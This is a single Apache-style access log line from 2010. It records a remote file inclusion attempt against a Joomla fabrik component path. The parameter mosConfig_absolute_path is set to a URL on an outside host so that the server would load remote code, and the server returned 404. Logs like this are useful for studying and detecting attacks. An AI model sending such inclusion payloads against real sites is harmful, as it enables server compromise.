218.38.243.44 - - [15/Feb/2010:02:56:53 -0500] "GET /logs/error_log.Q110020700%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.waytochristmission.com//gbbs/data/asu/id1.txt? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
